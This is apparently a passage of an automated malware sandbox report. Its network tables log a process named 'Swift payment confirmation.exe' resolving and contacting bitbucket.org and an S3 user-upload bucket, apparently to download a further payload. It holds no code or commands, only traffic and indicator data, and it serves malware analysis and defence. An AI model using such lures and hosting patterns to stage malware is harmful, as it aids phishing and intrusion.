                                                                              Oct 31, 2024 09:07:04.779227972 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.779242039 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.829564095 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855276108 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855287075 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855348110 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855360985 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855412960 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855432987 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.855463982 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855526924 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.855530977 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895847082 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895855904 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895870924 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895889044 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895925045 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.895935059 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.895977020 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.941555023 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.971946001 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.971956015 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.971992970 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972002029 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972023964 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972054958 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:04.972064018 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:04.972104073 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.019182920 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019222975 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019232988 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019246101 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019285917 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.019301891 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.019372940 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.071855068 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.088224888 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088233948 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088278055 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088293076 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088315964 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088324070 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.088324070 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.088397980 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.089715958 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.089723110 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.089759111 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.089768887 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.091131926 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.094237089 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.094244003 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.149581909 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173146009 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173154116 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173197031 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173208952 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173238993 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173242092 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173293114 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173707962 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173722029 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.173744917 CET49709443192.168.2.552.217.102.228
                                                                              Oct 31, 2024 09:07:05.173749924 CET4434970952.217.102.228192.168.2.5
                                                                              Oct 31, 2024 09:07:05.222295046 CET49710443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.222316980 CET44349710185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:05.222413063 CET49710443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.222568989 CET49710443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.222601891 CET44349710185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:05.222661972 CET49710443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.240618944 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.240720987 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:05.240827084 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.241234064 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:05.241271973 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.082489967 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.082586050 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.085169077 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.085199118 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.085464001 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.100673914 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.147329092 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.499360085 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.499381065 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.499432087 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.499449968 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.499509096 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.499741077 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.499782085 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.499830961 CET49711443192.168.2.5185.166.143.50
                                                                              Oct 31, 2024 09:07:06.499846935 CET44349711185.166.143.50192.168.2.5
                                                                              Oct 31, 2024 09:07:06.521456957 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:06.521487951 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:06.521579981 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:06.521893978 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:06.521908998 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.200099945 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.200226068 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.204708099 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.204715967 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.204962969 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.206151962 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.247379065 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.396588087 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.398850918 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.398866892 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.398947954 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.398972034 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.399035931 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.517465115 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.517483950 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.517509937 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.517587900 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.517620087 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.559551001 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.635826111 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.635845900 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.635870934 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.635946035 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.635963917 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.635979891 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.636015892 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.636025906 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.636033058 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.637037039 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.637084961 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.637125015 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.637134075 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.637176037 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.753592968 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.753612041 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.753665924 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.753715038 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.753735065 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.753767014 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.755573034 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.755598068 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.755642891 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.755650997 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.755685091 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.799552917 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.799566031 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.847563982 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.873246908 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.873256922 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.873294115 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.873334885 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.873348951 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.873359919 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.873400927 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.873542070 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.873584986 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.873593092 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.874330044 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.874365091 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.874399900 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.874408007 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.874452114 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.991655111 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.991674900 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.991714001 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.991769075 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:07.991791964 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:07.991802931 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.033433914 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.033454895 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.033554077 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.033572912 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.085633039 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.110805988 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.110816002 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.110852957 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.110882998 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.110892057 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.111016035 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.111027956 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.111123085 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.111172915 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.111181021 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.112109900 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.112144947 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.112178087 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.112185001 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.112235069 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.228068113 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.228180885 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.228193998 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.229680061 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.229696035 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.229752064 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.229759932 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.229794979 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.277559996 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.277569056 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.325567961 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.346863031 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.346869946 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.346906900 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.346915960 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.346951008 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.347130060 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.347130060 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.347151995 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.348676920 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.348696947 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.348722935 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.348752975 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.348763943 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.348795891 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.349024057 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.349077940 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.349085093 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.389420033 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.389452934 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.389516115 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.389538050 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.389683008 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.465677023 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.465687037 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.465785027 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.465814114 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.467375994 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.467391968 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.467456102 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.467467070 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.508976936 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.509015083 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.509047985 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.509052992 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.509073019 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.509085894 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.509129047 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.585127115 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.585160971 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.585201979 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.585220098 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.585264921 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.585942030 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.586015940 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.586024046 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.626926899 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.626966000 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.627008915 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.627022028 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.627064943 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.703396082 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.703409910 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.703495026 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.703520060 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.703563929 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.703571081 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.705173016 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.705188990 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.705234051 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.705244064 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.705276012 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.705709934 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.705769062 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.705775976 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.745929956 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.745966911 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.746035099 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.746057034 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.746109009 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.746613026 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.746676922 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.746681929 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.746721029 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.746786118 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.746798992 CET443497123.5.29.82192.168.2.5
                                                                              Oct 31, 2024 09:07:08.746809959 CET49712443192.168.2.53.5.29.82
                                                                              Oct 31, 2024 09:07:08.746814966 CET443497123.5.29.82192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Oct 31, 2024 09:06:57.131051064 CET5014553192.168.2.51.1.1.1
                                                                              Oct 31, 2024 09:06:57.138525963 CET53501451.1.1.1192.168.2.5
                                                                              Oct 31, 2024 09:06:58.835000992 CET5139653192.168.2.51.1.1.1
                                                                              Oct 31, 2024 09:06:58.863223076 CET53513961.1.1.1192.168.2.5
                                                                              Oct 31, 2024 09:07:06.501331091 CET6385953192.168.2.51.1.1.1
                                                                              Oct 31, 2024 09:07:06.520440102 CET53638591.1.1.1192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Oct 31, 2024 09:06:57.131051064 CET192.168.2.51.1.1.10xffc6Standard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.835000992 CET192.168.2.51.1.1.10xbb1Standard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.501331091 CET192.168.2.51.1.1.10x9b7eStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Oct 31, 2024 09:06:57.138525963 CET1.1.1.1192.168.2.50xffc6No error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:57.138525963 CET1.1.1.1192.168.2.50xffc6No error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:57.138525963 CET1.1.1.1192.168.2.50xffc6No error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.217.102.228A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.216.97.171A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.216.107.180A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com3.5.29.224A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.217.170.97A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.217.121.169A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.217.225.113A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:06:58.863223076 CET1.1.1.1192.168.2.50xbb1No error (0)s3-w.us-east-1.amazonaws.com52.216.222.9A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com3.5.29.82A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com54.231.131.65A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com52.216.170.139A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com16.182.41.233A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com52.217.171.9A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com16.182.40.217A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com52.217.130.145A (IP address)IN (0x0001)false
                                                                              Oct 31, 2024 09:07:06.520440102 CET1.1.1.1192.168.2.50x9b7eNo error (0)s3-w.us-east-1.amazonaws.com52.217.103.225A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • bitbucket.org
                                                                              • bbuseruploads.s3.amazonaws.com

                                                                              HTTPS Proxied Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549705185.166.143.504431968C:\Users\user\Desktop\Swift payment confirmation.exe
                                                                              TimestampBytes transferredDirectionData
